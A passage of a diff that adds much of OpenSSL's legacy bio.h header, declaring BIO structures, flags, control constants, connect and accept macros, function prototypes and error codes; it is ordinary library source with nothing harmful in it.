+ * This is used with memory BIOs: it means we shouldn't free up or change the
+ * data in any way.
+ */
+# define BIO_FLAGS_MEM_RDONLY    0x200
+
+typedef struct bio_st BIO;
+
+void BIO_set_flags(BIO *b, int flags);
+int BIO_test_flags(const BIO *b, int flags);
+void BIO_clear_flags(BIO *b, int flags);
+
+# define BIO_get_flags(b) BIO_test_flags(b, ~(0x0))
+# define BIO_set_retry_special(b) \
+                BIO_set_flags(b, (BIO_FLAGS_IO_SPECIAL|BIO_FLAGS_SHOULD_RETRY))
+# define BIO_set_retry_read(b) \
+                BIO_set_flags(b, (BIO_FLAGS_READ|BIO_FLAGS_SHOULD_RETRY))
+# define BIO_set_retry_write(b) \
+                BIO_set_flags(b, (BIO_FLAGS_WRITE|BIO_FLAGS_SHOULD_RETRY))
+
+/* These are normally used internally in BIOs */
+# define BIO_clear_retry_flags(b) \
+                BIO_clear_flags(b, (BIO_FLAGS_RWS|BIO_FLAGS_SHOULD_RETRY))
+# define BIO_get_retry_flags(b) \
+                BIO_test_flags(b, (BIO_FLAGS_RWS|BIO_FLAGS_SHOULD_RETRY))
+
+/* These should be used by the application to tell why we should retry */
+# define BIO_should_read(a)              BIO_test_flags(a, BIO_FLAGS_READ)
+# define BIO_should_write(a)             BIO_test_flags(a, BIO_FLAGS_WRITE)
+# define BIO_should_io_special(a)        BIO_test_flags(a, BIO_FLAGS_IO_SPECIAL)
+# define BIO_retry_type(a)               BIO_test_flags(a, BIO_FLAGS_RWS)
+# define BIO_should_retry(a)             BIO_test_flags(a, BIO_FLAGS_SHOULD_RETRY)
+
+/*
+ * The next three are used in conjunction with the BIO_should_io_special()
+ * condition.  After this returns true, BIO *BIO_get_retry_BIO(BIO *bio, int
+ * *reason); will walk the BIO stack and return the 'reason' for the special
+ * and the offending BIO. Given a BIO, BIO_get_retry_reason(bio) will return
+ * the code.
+ */
+/*
+ * Returned from the SSL bio when the certificate retrieval code had an error
+ */
+# define BIO_RR_SSL_X509_LOOKUP          0x01
+/* Returned from the connect BIO when a connect would have blocked */
+# define BIO_RR_CONNECT                  0x02
+/* Returned from the accept BIO when an accept would have blocked */
+# define BIO_RR_ACCEPT                   0x03
+
+/* These are passed by the BIO callback */
+# define BIO_CB_FREE     0x01
+# define BIO_CB_READ     0x02
+# define BIO_CB_WRITE    0x03
+# define BIO_CB_PUTS     0x04
+# define BIO_CB_GETS     0x05
+# define BIO_CB_CTRL     0x06
+
+/*
+ * The callback is called before and after the underling operation, The
+ * BIO_CB_RETURN flag indicates if it is after the call
+ */
+# define BIO_CB_RETURN   0x80
+# define BIO_CB_return(a) ((a)|BIO_CB_RETURN))
+# define BIO_cb_pre(a)   (!((a)&BIO_CB_RETURN))
+# define BIO_cb_post(a)  ((a)&BIO_CB_RETURN)
+
+long (*BIO_get_callback(const BIO *b)) (struct bio_st *, int, const char *,
+                                        int, long, long);
+void BIO_set_callback(BIO *b,
+                      long (*callback) (struct bio_st *, int, const char *,
+                                        int, long, long));
+char *BIO_get_callback_arg(const BIO *b);
+void BIO_set_callback_arg(BIO *b, char *arg);
+
+const char *BIO_method_name(const BIO *b);
+int BIO_method_type(const BIO *b);
+
+typedef void bio_info_cb (struct bio_st *, int, const char *, int, long,
+                          long);
+
+typedef struct bio_method_st {
+    int type;
+    const char *name;
+    int (*bwrite) (BIO *, const char *, int);
+    int (*bread) (BIO *, char *, int);
+    int (*bputs) (BIO *, const char *);
+    int (*bgets) (BIO *, char *, int);
+    long (*ctrl) (BIO *, int, long, void *);
+    int (*create) (BIO *);
+    int (*destroy) (BIO *);
+    long (*callback_ctrl) (BIO *, int, bio_info_cb *);
+} BIO_METHOD;
+
+struct bio_st {
+    BIO_METHOD *method;
+    /* bio, mode, argp, argi, argl, ret */
+    long (*callback) (struct bio_st *, int, const char *, int, long, long);
+    char *cb_arg;               /* first argument for the callback */
+    int init;
+    int shutdown;
+    int flags;                  /* extra storage */
+    int retry_reason;
+    int num;
+    void *ptr;
+    struct bio_st *next_bio;    /* used by filter BIOs */
+    struct bio_st *prev_bio;    /* used by filter BIOs */
+    int references;
+    unsigned long num_read;
+    unsigned long num_write;
+    CRYPTO_EX_DATA ex_data;
+};
+
+DECLARE_STACK_OF(BIO)
+
+typedef struct bio_f_buffer_ctx_struct {
+    /*-
+     * Buffers are setup like this:
+     *
+     * <---------------------- size ----------------------->
+     * +---------------------------------------------------+
+     * | consumed | remaining          | free space        |
+     * +---------------------------------------------------+
+     * <-- off --><------- len ------->
+     */
+    /*- BIO *bio; *//*
+     * this is now in the BIO struct
+     */
+    int ibuf_size;              /* how big is the input buffer */
+    int obuf_size;              /* how big is the output buffer */
+    char *ibuf;                 /* the char array */
+    int ibuf_len;               /* how many bytes are in it */
+    int ibuf_off;               /* write/read offset */
+    char *obuf;                 /* the char array */
+    int obuf_len;               /* how many bytes are in it */
+    int obuf_off;               /* write/read offset */
+} BIO_F_BUFFER_CTX;
+
+/* Prefix and suffix callback in ASN1 BIO */
+typedef int asn1_ps_func (BIO *b, unsigned char **pbuf, int *plen,
+                          void *parg);
+
+# ifndef OPENSSL_NO_SCTP
+/* SCTP parameter structs */
+struct bio_dgram_sctp_sndinfo {
+    uint16_t snd_sid;
+    uint16_t snd_flags;
+    uint32_t snd_ppid;
+    uint32_t snd_context;
+};
+
+struct bio_dgram_sctp_rcvinfo {
+    uint16_t rcv_sid;
+    uint16_t rcv_ssn;
+    uint16_t rcv_flags;
+    uint32_t rcv_ppid;
+    uint32_t rcv_tsn;
+    uint32_t rcv_cumtsn;
+    uint32_t rcv_context;
+};
+
+struct bio_dgram_sctp_prinfo {
+    uint16_t pr_policy;
+    uint32_t pr_value;
+};
+# endif
+
+/* connect BIO stuff */
+# define BIO_CONN_S_BEFORE               1
+# define BIO_CONN_S_GET_IP               2
+# define BIO_CONN_S_GET_PORT             3
+# define BIO_CONN_S_CREATE_SOCKET        4
+# define BIO_CONN_S_CONNECT              5
+# define BIO_CONN_S_OK                   6
+# define BIO_CONN_S_BLOCKED_CONNECT      7
+# define BIO_CONN_S_NBIO                 8
+/*
+ * #define BIO_CONN_get_param_hostname BIO_ctrl
+ */
+
+# define BIO_C_SET_CONNECT                       100
+# define BIO_C_DO_STATE_MACHINE                  101
+# define BIO_C_SET_NBIO                          102
+# define BIO_C_SET_PROXY_PARAM                   103
+# define BIO_C_SET_FD                            104
+# define BIO_C_GET_FD                            105
+# define BIO_C_SET_FILE_PTR                      106
+# define BIO_C_GET_FILE_PTR                      107
+# define BIO_C_SET_FILENAME                      108
+# define BIO_C_SET_SSL                           109
+# define BIO_C_GET_SSL                           110
+# define BIO_C_SET_MD                            111
+# define BIO_C_GET_MD                            112
+# define BIO_C_GET_CIPHER_STATUS                 113
+# define BIO_C_SET_BUF_MEM                       114
+# define BIO_C_GET_BUF_MEM_PTR                   115
+# define BIO_C_GET_BUFF_NUM_LINES                116
+# define BIO_C_SET_BUFF_SIZE                     117
+# define BIO_C_SET_ACCEPT                        118
+# define BIO_C_SSL_MODE                          119
+# define BIO_C_GET_MD_CTX                        120
+# define BIO_C_GET_PROXY_PARAM                   121
+# define BIO_C_SET_BUFF_READ_DATA                122/* data to read first */
+# define BIO_C_GET_CONNECT                       123
+# define BIO_C_GET_ACCEPT                        124
+# define BIO_C_SET_SSL_RENEGOTIATE_BYTES         125
+# define BIO_C_GET_SSL_NUM_RENEGOTIATES          126
+# define BIO_C_SET_SSL_RENEGOTIATE_TIMEOUT       127
+# define BIO_C_FILE_SEEK                         128
+# define BIO_C_GET_CIPHER_CTX                    129
+# define BIO_C_SET_BUF_MEM_EOF_RETURN            130/* return end of input
+                                                     * value */
+# define BIO_C_SET_BIND_MODE                     131
+# define BIO_C_GET_BIND_MODE                     132
+# define BIO_C_FILE_TELL                         133
+# define BIO_C_GET_SOCKS                         134
+# define BIO_C_SET_SOCKS                         135
+
+# define BIO_C_SET_WRITE_BUF_SIZE                136/* for BIO_s_bio */
+# define BIO_C_GET_WRITE_BUF_SIZE                137
+# define BIO_C_MAKE_BIO_PAIR                     138
+# define BIO_C_DESTROY_BIO_PAIR                  139
+# define BIO_C_GET_WRITE_GUARANTEE               140
+# define BIO_C_GET_READ_REQUEST                  141
+# define BIO_C_SHUTDOWN_WR                       142
+# define BIO_C_NREAD0                            143
+# define BIO_C_NREAD                             144
+# define BIO_C_NWRITE0                           145
+# define BIO_C_NWRITE                            146
+# define BIO_C_RESET_READ_REQUEST                147
+# define BIO_C_SET_MD_CTX                        148
+
+# define BIO_C_SET_PREFIX                        149
+# define BIO_C_GET_PREFIX                        150
+# define BIO_C_SET_SUFFIX                        151
+# define BIO_C_GET_SUFFIX                        152
+
+# define BIO_C_SET_EX_ARG                        153
+# define BIO_C_GET_EX_ARG                        154
+
+# define BIO_set_app_data(s,arg)         BIO_set_ex_data(s,0,arg)
+# define BIO_get_app_data(s)             BIO_get_ex_data(s,0)
+
+/* BIO_s_connect() and BIO_s_socks4a_connect() */
+# define BIO_set_conn_hostname(b,name) BIO_ctrl(b,BIO_C_SET_CONNECT,0,(char *)name)
+# define BIO_set_conn_port(b,port) BIO_ctrl(b,BIO_C_SET_CONNECT,1,(char *)port)
+# define BIO_set_conn_ip(b,ip)     BIO_ctrl(b,BIO_C_SET_CONNECT,2,(char *)ip)
+# define BIO_set_conn_int_port(b,port) BIO_ctrl(b,BIO_C_SET_CONNECT,3,(char *)port)
+# define BIO_get_conn_hostname(b)  BIO_ptr_ctrl(b,BIO_C_GET_CONNECT,0)
+# define BIO_get_conn_port(b)      BIO_ptr_ctrl(b,BIO_C_GET_CONNECT,1)
+# define BIO_get_conn_ip(b)               BIO_ptr_ctrl(b,BIO_C_GET_CONNECT,2)
+# define BIO_get_conn_int_port(b) BIO_int_ctrl(b,BIO_C_GET_CONNECT,3,0)
+
+# define BIO_set_nbio(b,n)       BIO_ctrl(b,BIO_C_SET_NBIO,(n),NULL)
+
+/* BIO_s_accept_socket() */
+# define BIO_set_accept_port(b,name) BIO_ctrl(b,BIO_C_SET_ACCEPT,0,(char *)name)
+# define BIO_get_accept_port(b)  BIO_ptr_ctrl(b,BIO_C_GET_ACCEPT,0)
+/* #define BIO_set_nbio(b,n)    BIO_ctrl(b,BIO_C_SET_NBIO,(n),NULL) */
+# define BIO_set_nbio_accept(b,n) BIO_ctrl(b,BIO_C_SET_ACCEPT,1,(n)?(void *)"a":NULL)
+# define BIO_set_accept_bios(b,bio) BIO_ctrl(b,BIO_C_SET_ACCEPT,2,(char *)bio)
+
+# define BIO_BIND_NORMAL                 0
+# define BIO_BIND_REUSEADDR_IF_UNUSED    1
+# define BIO_BIND_REUSEADDR              2
+# define BIO_set_bind_mode(b,mode) BIO_ctrl(b,BIO_C_SET_BIND_MODE,mode,NULL)
+# define BIO_get_bind_mode(b,mode) BIO_ctrl(b,BIO_C_GET_BIND_MODE,0,NULL)
+
+# define BIO_do_connect(b)       BIO_do_handshake(b)
+# define BIO_do_accept(b)        BIO_do_handshake(b)
+# define BIO_do_handshake(b)     BIO_ctrl(b,BIO_C_DO_STATE_MACHINE,0,NULL)
+
+/* BIO_s_proxy_client() */
+# define BIO_set_url(b,url)      BIO_ctrl(b,BIO_C_SET_PROXY_PARAM,0,(char *)(url))
+# define BIO_set_proxies(b,p)    BIO_ctrl(b,BIO_C_SET_PROXY_PARAM,1,(char *)(p))
+/* BIO_set_nbio(b,n) */
+# define BIO_set_filter_bio(b,s) BIO_ctrl(b,BIO_C_SET_PROXY_PARAM,2,(char *)(s))
+/* BIO *BIO_get_filter_bio(BIO *bio); */
+# define BIO_set_proxy_cb(b,cb) BIO_callback_ctrl(b,BIO_C_SET_PROXY_PARAM,3,(void *(*cb)()))
+# define BIO_set_proxy_header(b,sk) BIO_ctrl(b,BIO_C_SET_PROXY_PARAM,4,(char *)sk)
+# define BIO_set_no_connect_return(b,bool) BIO_int_ctrl(b,BIO_C_SET_PROXY_PARAM,5,bool)
+
+# define BIO_get_proxy_header(b,skp) BIO_ctrl(b,BIO_C_GET_PROXY_PARAM,0,(char *)skp)
+# define BIO_get_proxies(b,pxy_p) BIO_ctrl(b,BIO_C_GET_PROXY_PARAM,1,(char *)(pxy_p))
+# define BIO_get_url(b,url)      BIO_ctrl(b,BIO_C_GET_PROXY_PARAM,2,(char *)(url))
+# define BIO_get_no_connect_return(b)    BIO_ctrl(b,BIO_C_GET_PROXY_PARAM,5,NULL)
+
+# define BIO_set_fd(b,fd,c)      BIO_int_ctrl(b,BIO_C_SET_FD,c,fd)
+# define BIO_get_fd(b,c)         BIO_ctrl(b,BIO_C_GET_FD,0,(char *)c)
+
+# define BIO_set_fp(b,fp,c)      BIO_ctrl(b,BIO_C_SET_FILE_PTR,c,(char *)fp)
+# define BIO_get_fp(b,fpp)       BIO_ctrl(b,BIO_C_GET_FILE_PTR,0,(char *)fpp)
+
+# define BIO_seek(b,ofs) (int)BIO_ctrl(b,BIO_C_FILE_SEEK,ofs,NULL)
+# define BIO_tell(b)     (int)BIO_ctrl(b,BIO_C_FILE_TELL,0,NULL)
+
+/*
+ * name is cast to lose const, but might be better to route through a
+ * function so we can do it safely
+ */
+# ifdef CONST_STRICT
+/*
+ * If you are wondering why this isn't defined, its because CONST_STRICT is
+ * purely a compile-time kludge to allow const to be checked.
+ */
+int BIO_read_filename(BIO *b, const char *name);
+# else
+#  define BIO_read_filename(b,name) BIO_ctrl(b,BIO_C_SET_FILENAME, \
+                BIO_CLOSE|BIO_FP_READ,(char *)name)
+# endif
+# define BIO_write_filename(b,name) BIO_ctrl(b,BIO_C_SET_FILENAME, \
+                BIO_CLOSE|BIO_FP_WRITE,name)
+# define BIO_append_filename(b,name) BIO_ctrl(b,BIO_C_SET_FILENAME, \
+                BIO_CLOSE|BIO_FP_APPEND,name)
+# define BIO_rw_filename(b,name) BIO_ctrl(b,BIO_C_SET_FILENAME, \
+                BIO_CLOSE|BIO_FP_READ|BIO_FP_WRITE,name)
+
+/*
+ * WARNING WARNING, this ups the reference count on the read bio of the SSL
+ * structure.  This is because the ssl read BIO is now pointed to by the
+ * next_bio field in the bio.  So when you free the BIO, make sure you are
+ * doing a BIO_free_all() to catch the underlying BIO.
+ */
+# define BIO_set_ssl(b,ssl,c)    BIO_ctrl(b,BIO_C_SET_SSL,c,(char *)ssl)
+# define BIO_get_ssl(b,sslp)     BIO_ctrl(b,BIO_C_GET_SSL,0,(char *)sslp)
+# define BIO_set_ssl_mode(b,client)      BIO_ctrl(b,BIO_C_SSL_MODE,client,NULL)
+# define BIO_set_ssl_renegotiate_bytes(b,num) \
+        BIO_ctrl(b,BIO_C_SET_SSL_RENEGOTIATE_BYTES,num,NULL);
+# define BIO_get_num_renegotiates(b) \
+        BIO_ctrl(b,BIO_C_GET_SSL_NUM_RENEGOTIATES,0,NULL);
+# define BIO_set_ssl_renegotiate_timeout(b,seconds) \
+        BIO_ctrl(b,BIO_C_SET_SSL_RENEGOTIATE_TIMEOUT,seconds,NULL);
+
+/* defined in evp.h */
+/* #define BIO_set_md(b,md)     BIO_ctrl(b,BIO_C_SET_MD,1,(char *)md) */
+
+# define BIO_get_mem_data(b,pp)  BIO_ctrl(b,BIO_CTRL_INFO,0,(char *)pp)
+# define BIO_set_mem_buf(b,bm,c) BIO_ctrl(b,BIO_C_SET_BUF_MEM,c,(char *)bm)
+# define BIO_get_mem_ptr(b,pp)   BIO_ctrl(b,BIO_C_GET_BUF_MEM_PTR,0,(char *)pp)
+# define BIO_set_mem_eof_return(b,v) \
+                                BIO_ctrl(b,BIO_C_SET_BUF_MEM_EOF_RETURN,v,NULL)
+
+/* For the BIO_f_buffer() type */
+# define BIO_get_buffer_num_lines(b)     BIO_ctrl(b,BIO_C_GET_BUFF_NUM_LINES,0,NULL)
+# define BIO_set_buffer_size(b,size)     BIO_ctrl(b,BIO_C_SET_BUFF_SIZE,size,NULL)
+# define BIO_set_read_buffer_size(b,size) BIO_int_ctrl(b,BIO_C_SET_BUFF_SIZE,size,0)
+# define BIO_set_write_buffer_size(b,size) BIO_int_ctrl(b,BIO_C_SET_BUFF_SIZE,size,1)
+# define BIO_set_buffer_read_data(b,buf,num) BIO_ctrl(b,BIO_C_SET_BUFF_READ_DATA,num,buf)
+
+/* Don't use the next one unless you know what you are doing :-) */
+# define BIO_dup_state(b,ret)    BIO_ctrl(b,BIO_CTRL_DUP,0,(char *)(ret))
+
+# define BIO_reset(b)            (int)BIO_ctrl(b,BIO_CTRL_RESET,0,NULL)
+# define BIO_eof(b)              (int)BIO_ctrl(b,BIO_CTRL_EOF,0,NULL)
+# define BIO_set_close(b,c)      (int)BIO_ctrl(b,BIO_CTRL_SET_CLOSE,(c),NULL)
+# define BIO_get_close(b)        (int)BIO_ctrl(b,BIO_CTRL_GET_CLOSE,0,NULL)
+# define BIO_pending(b)          (int)BIO_ctrl(b,BIO_CTRL_PENDING,0,NULL)
+# define BIO_wpending(b)         (int)BIO_ctrl(b,BIO_CTRL_WPENDING,0,NULL)
+/* ...pending macros have inappropriate return type */
+size_t BIO_ctrl_pending(BIO *b);
+size_t BIO_ctrl_wpending(BIO *b);
+# define BIO_flush(b)            (int)BIO_ctrl(b,BIO_CTRL_FLUSH,0,NULL)
+# define BIO_get_info_callback(b,cbp) (int)BIO_ctrl(b,BIO_CTRL_GET_CALLBACK,0, \
+                                                   cbp)
+# define BIO_set_info_callback(b,cb) (int)BIO_callback_ctrl(b,BIO_CTRL_SET_CALLBACK,cb)
+
+/* For the BIO_f_buffer() type */
+# define BIO_buffer_get_num_lines(b) BIO_ctrl(b,BIO_CTRL_GET,0,NULL)
+
+/* For BIO_s_bio() */
+# define BIO_set_write_buf_size(b,size) (int)BIO_ctrl(b,BIO_C_SET_WRITE_BUF_SIZE,size,NULL)
+# define BIO_get_write_buf_size(b,size) (size_t)BIO_ctrl(b,BIO_C_GET_WRITE_BUF_SIZE,size,NULL)
+# define BIO_make_bio_pair(b1,b2)   (int)BIO_ctrl(b1,BIO_C_MAKE_BIO_PAIR,0,b2)
+# define BIO_destroy_bio_pair(b)    (int)BIO_ctrl(b,BIO_C_DESTROY_BIO_PAIR,0,NULL)
+# define BIO_shutdown_wr(b) (int)BIO_ctrl(b, BIO_C_SHUTDOWN_WR, 0, NULL)
+/* macros with inappropriate type -- but ...pending macros use int too: */
+# define BIO_get_write_guarantee(b) (int)BIO_ctrl(b,BIO_C_GET_WRITE_GUARANTEE,0,NULL)
+# define BIO_get_read_request(b)    (int)BIO_ctrl(b,BIO_C_GET_READ_REQUEST,0,NULL)
+size_t BIO_ctrl_get_write_guarantee(BIO *b);
+size_t BIO_ctrl_get_read_request(BIO *b);
+int BIO_ctrl_reset_read_request(BIO *b);
+
+/* ctrl macros for dgram */
+# define BIO_ctrl_dgram_connect(b,peer)  \
+                     (int)BIO_ctrl(b,BIO_CTRL_DGRAM_CONNECT,0, (char *)peer)
+# define BIO_ctrl_set_connected(b, state, peer) \
+         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_SET_CONNECTED, state, (char *)peer)
+# define BIO_dgram_recv_timedout(b) \
+         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_GET_RECV_TIMER_EXP, 0, NULL)
+# define BIO_dgram_send_timedout(b) \
+         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_GET_SEND_TIMER_EXP, 0, NULL)
+# define BIO_dgram_get_peer(b,peer) \
+         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_GET_PEER, 0, (char *)peer)
+# define BIO_dgram_set_peer(b,peer) \
+         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_SET_PEER, 0, (char *)peer)
+# define BIO_dgram_get_mtu_overhead(b) \
+         (unsigned int)BIO_ctrl((b), BIO_CTRL_DGRAM_GET_MTU_OVERHEAD, 0, NULL)
+
+/* These two aren't currently implemented */
+/* int BIO_get_ex_num(BIO *bio); */
+/* void BIO_set_ex_free_func(BIO *bio,int idx,void (*cb)()); */
+int BIO_set_ex_data(BIO *bio, int idx, void *data);
+void *BIO_get_ex_data(BIO *bio, int idx);
+int BIO_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                         CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
+unsigned long BIO_number_read(BIO *bio);
+unsigned long BIO_number_written(BIO *bio);
+
+/* For BIO_f_asn1() */
+int BIO_asn1_set_prefix(BIO *b, asn1_ps_func *prefix,
+                        asn1_ps_func *prefix_free);
+int BIO_asn1_get_prefix(BIO *b, asn1_ps_func **pprefix,
+                        asn1_ps_func **pprefix_free);
+int BIO_asn1_set_suffix(BIO *b, asn1_ps_func *suffix,
+                        asn1_ps_func *suffix_free);
+int BIO_asn1_get_suffix(BIO *b, asn1_ps_func **psuffix,
+                        asn1_ps_func **psuffix_free);
+
+# ifndef OPENSSL_NO_FP_API
+BIO_METHOD *BIO_s_file(void);
+BIO *BIO_new_file(const char *filename, const char *mode);
+BIO *BIO_new_fp(FILE *stream, int close_flag);
+#  define BIO_s_file_internal    BIO_s_file
+# endif
+BIO *BIO_new(BIO_METHOD *type);
+int BIO_set(BIO *a, BIO_METHOD *type);
+int BIO_free(BIO *a);
+void BIO_vfree(BIO *a);
+int BIO_read(BIO *b, void *data, int len);
+int BIO_gets(BIO *bp, char *buf, int size);
+int BIO_write(BIO *b, const void *data, int len);
+int BIO_puts(BIO *bp, const char *buf);
+int BIO_indent(BIO *b, int indent, int max);
+long BIO_ctrl(BIO *bp, int cmd, long larg, void *parg);
+long BIO_callback_ctrl(BIO *b, int cmd,
+                       void (*fp) (struct bio_st *, int, const char *, int,
+                                   long, long));
+char *BIO_ptr_ctrl(BIO *bp, int cmd, long larg);
+long BIO_int_ctrl(BIO *bp, int cmd, long larg, int iarg);
+BIO *BIO_push(BIO *b, BIO *append);
+BIO *BIO_pop(BIO *b);
+void BIO_free_all(BIO *a);
+BIO *BIO_find_type(BIO *b, int bio_type);
+BIO *BIO_next(BIO *b);
+BIO *BIO_get_retry_BIO(BIO *bio, int *reason);
+int BIO_get_retry_reason(BIO *bio);
+BIO *BIO_dup_chain(BIO *in);
+
+int BIO_nread0(BIO *bio, char **buf);
+int BIO_nread(BIO *bio, char **buf, int num);
+int BIO_nwrite0(BIO *bio, char **buf);
+int BIO_nwrite(BIO *bio, char **buf, int num);
+
+long BIO_debug_callback(BIO *bio, int cmd, const char *argp, int argi,
+                        long argl, long ret);
+
+BIO_METHOD *BIO_s_mem(void);
+BIO *BIO_new_mem_buf(void *buf, int len);
+BIO_METHOD *BIO_s_socket(void);
+BIO_METHOD *BIO_s_connect(void);
+BIO_METHOD *BIO_s_accept(void);
+BIO_METHOD *BIO_s_fd(void);
+# ifndef OPENSSL_SYS_OS2
+BIO_METHOD *BIO_s_log(void);
+# endif
+BIO_METHOD *BIO_s_bio(void);
+BIO_METHOD *BIO_s_null(void);
+BIO_METHOD *BIO_f_null(void);
+BIO_METHOD *BIO_f_buffer(void);
+# ifdef OPENSSL_SYS_VMS
+BIO_METHOD *BIO_f_linebuffer(void);
+# endif
+BIO_METHOD *BIO_f_nbio_test(void);
+# ifndef OPENSSL_NO_DGRAM
+BIO_METHOD *BIO_s_datagram(void);
+#  ifndef OPENSSL_NO_SCTP
+BIO_METHOD *BIO_s_datagram_sctp(void);
+#  endif
+# endif
+
+/* BIO_METHOD *BIO_f_ber(void); */
+
+int BIO_sock_should_retry(int i);
+int BIO_sock_non_fatal_error(int error);
+int BIO_dgram_non_fatal_error(int error);
+
+int BIO_fd_should_retry(int i);
+int BIO_fd_non_fatal_error(int error);
+int BIO_dump_cb(int (*cb) (const void *data, size_t len, void *u),
+                void *u, const char *s, int len);
+int BIO_dump_indent_cb(int (*cb) (const void *data, size_t len, void *u),
+                       void *u, const char *s, int len, int indent);
+int BIO_dump(BIO *b, const char *bytes, int len);
+int BIO_dump_indent(BIO *b, const char *bytes, int len, int indent);
+# ifndef OPENSSL_NO_FP_API
+int BIO_dump_fp(FILE *fp, const char *s, int len);
+int BIO_dump_indent_fp(FILE *fp, const char *s, int len, int indent);
+# endif
+int BIO_hex_string(BIO *out, int indent, int width, unsigned char *data,
+                   int datalen);
+
+struct hostent *BIO_gethostbyname(const char *name);
+/*-
+ * We might want a thread-safe interface too:
+ * struct hostent *BIO_gethostbyname_r(const char *name,
+ *     struct hostent *result, void *buffer, size_t buflen);
+ * or something similar (caller allocates a struct hostent,
+ * pointed to by "result", and additional buffer space for the various
+ * substructures; if the buffer does not suffice, NULL is returned
+ * and an appropriate error code is set).
+ */
+int BIO_sock_error(int sock);
+int BIO_socket_ioctl(int fd, long type, void *arg);
+int BIO_socket_nbio(int fd, int mode);
+int BIO_get_port(const char *str, unsigned short *port_ptr);
+int BIO_get_host_ip(const char *str, unsigned char *ip);
+int BIO_get_accept_socket(char *host_port, int mode);
+int BIO_accept(int sock, char **ip_port);
+int BIO_sock_init(void);
+void BIO_sock_cleanup(void);
+int BIO_set_tcp_ndelay(int sock, int turn_on);
+
+BIO *BIO_new_socket(int sock, int close_flag);
+BIO *BIO_new_dgram(int fd, int close_flag);
+# ifndef OPENSSL_NO_SCTP
+BIO *BIO_new_dgram_sctp(int fd, int close_flag);
+int BIO_dgram_is_sctp(BIO *bio);
+int BIO_dgram_sctp_notification_cb(BIO *b,
+                                   void (*handle_notifications) (BIO *bio,
+                                                                 void
+                                                                 *context,
+                                                                 void *buf),
+                                   void *context);
+int BIO_dgram_sctp_wait_for_dry(BIO *b);
+int BIO_dgram_sctp_msg_waiting(BIO *b);
+# endif
+BIO *BIO_new_fd(int fd, int close_flag);
+BIO *BIO_new_connect(const char *host_port);
+BIO *BIO_new_accept(const char *host_port);
+
+int BIO_new_bio_pair(BIO **bio1, size_t writebuf1,
+                     BIO **bio2, size_t writebuf2);
+/*
+ * If successful, returns 1 and in *bio1, *bio2 two BIO pair endpoints.
+ * Otherwise returns 0 and sets *bio1 and *bio2 to NULL. Size 0 uses default
+ * value.
+ */
+
+void BIO_copy_next_retry(BIO *b);
+
+/*
+ * long BIO_ghbn_ctrl(int cmd,int iarg,char *parg);
+ */
+
+# ifdef __GNUC__
+#  define __bio_h__attr__ __attribute__
+# else
+#  define __bio_h__attr__(x)
+# endif
+int BIO_printf(BIO *bio, const char *format, ...)
+__bio_h__attr__((__format__(__printf__, 2, 3)));
+int BIO_vprintf(BIO *bio, const char *format, va_list args)
+__bio_h__attr__((__format__(__printf__, 2, 0)));
+int BIO_snprintf(char *buf, size_t n, const char *format, ...)
+__bio_h__attr__((__format__(__printf__, 3, 4)));
+int BIO_vsnprintf(char *buf, size_t n, const char *format, va_list args)
+__bio_h__attr__((__format__(__printf__, 3, 0)));
+# undef __bio_h__attr__
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_BIO_strings(void);
+
+/* Error codes for the BIO functions. */
+
+/* Function codes. */
+# define BIO_F_ACPT_STATE                                 100
+# define BIO_F_BIO_ACCEPT                                 101
+# define BIO_F_BIO_BER_GET_HEADER                         102
+# define BIO_F_BIO_CALLBACK_CTRL                          131
+# define BIO_F_BIO_CTRL                                   103
+# define BIO_F_BIO_GETHOSTBYNAME                          120
+# define BIO_F_BIO_GETS                                   104
+# define BIO_F_BIO_GET_ACCEPT_SOCKET                      105
+# define BIO_F_BIO_GET_HOST_IP                            106
+# define BIO_F_BIO_GET_PORT                               107
+# define BIO_F_BIO_MAKE_PAIR                              121
+# define BIO_F_BIO_NEW                                    108
+# define BIO_F_BIO_NEW_FILE                               109
+# define BIO_F_BIO_NEW_MEM_BUF                            126
+# define BIO_F_BIO_NREAD                                  123
+# define BIO_F_BIO_NREAD0                                 124
+# define BIO_F_BIO_NWRITE                                 125
+# define BIO_F_BIO_NWRITE0                                122
+# define BIO_F_BIO_PUTS                                   110
+# define BIO_F_BIO_READ                                   111
+# define BIO_F_BIO_SOCK_INIT                              112
+# define BIO_F_BIO_WRITE                                  113
+# define BIO_F_BUFFER_CTRL                                114
+# define BIO_F_CONN_CTRL                                  127
+# define BIO_F_CONN_STATE                                 115
+# define BIO_F_DGRAM_SCTP_READ                            132
+# define BIO_F_FILE_CTRL                                  116
+# define BIO_F_FILE_READ                                  130
+# define BIO_F_LINEBUFFER_CTRL                            129
+# define BIO_F_MEM_READ                                   128
+# define BIO_F_MEM_WRITE                                  117
+# define BIO_F_SSL_NEW                                    118
+# define BIO_F_WSASTARTUP                                 119
+
+/* Reason codes. */
+# define BIO_R_ACCEPT_ERROR                               100
+# define BIO_R_BAD_FOPEN_MODE                             101
+# define BIO_R_BAD_HOSTNAME_LOOKUP                        102
+# define BIO_R_BROKEN_PIPE                                124
+# define BIO_R_CONNECT_ERROR                              103
+# define BIO_R_EOF_ON_MEMORY_BIO                          127
+# define BIO_R_ERROR_SETTING_NBIO                         104
+# define BIO_R_ERROR_SETTING_NBIO_ON_ACCEPTED_SOCKET      105
+# define BIO_R_ERROR_SETTING_NBIO_ON_ACCEPT_SOCKET        106
+# define BIO_R_GETHOSTBYNAME_ADDR_IS_NOT_AF_INET          107
+# define BIO_R_INVALID_ARGUMENT                           125
+# define BIO_R_INVALID_IP_ADDRESS                         108
+# define BIO_R_IN_USE                                     123
+# define BIO_R_KEEPALIVE                                  109
+# define BIO_R_NBIO_CONNECT_ERROR                         110
+# define BIO_R_NO_ACCEPT_PORT_SPECIFIED                   111
+# define BIO_R_NO_HOSTNAME_SPECIFIED                      112
+# define BIO_R_NO_PORT_DEFINED                            113
+# define BIO_R_NO_PORT_SPECIFIED                          114
+# define BIO_R_NO_SUCH_FILE                               128
+# define BIO_R_NULL_PARAMETER                             115
+# define BIO_R_TAG_MISMATCH                               116
+# define BIO_R_UNABLE_TO_BIND_SOCKET                      117
